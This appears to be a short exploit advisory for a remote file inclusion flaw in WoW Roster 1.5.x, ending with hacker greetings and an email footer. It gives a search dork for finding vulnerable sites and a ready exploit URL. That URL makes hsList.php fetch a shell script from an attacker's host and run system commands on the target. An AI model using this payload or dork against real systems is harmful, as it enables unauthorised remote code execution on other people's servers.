Title : WoW Roster <= 1.5.x Remote File Include (hsList.php)

###############################################################################

Discovered By  ::::  AG-Spider

-----------------------------------------------------------------------------
Class  : Remote file include
Rish   : Danger
-----------------------------------------------------------------------------

dork        : "wow roster version 1.5"

Exploit    :  
http://www.site.com/[wow_roster_path]/hsList.php?subdir=http://[Shellc0de]]/cmd.txt?&cmd=ls


----------------------------------------------------------------------------

greetz4: [ Black-Code  -  KILLERxXx - KaBaRa.HaCk .eGy]

c0natct us : AG-Spider [ at ] HoTMail.CoM
thx 2 :::::: Lezr.com & 3asfh.net

_________________________________________________________________
The new MSN Search Toolbar now includes Desktop search! 
http://join.msn.com/toolbar/overview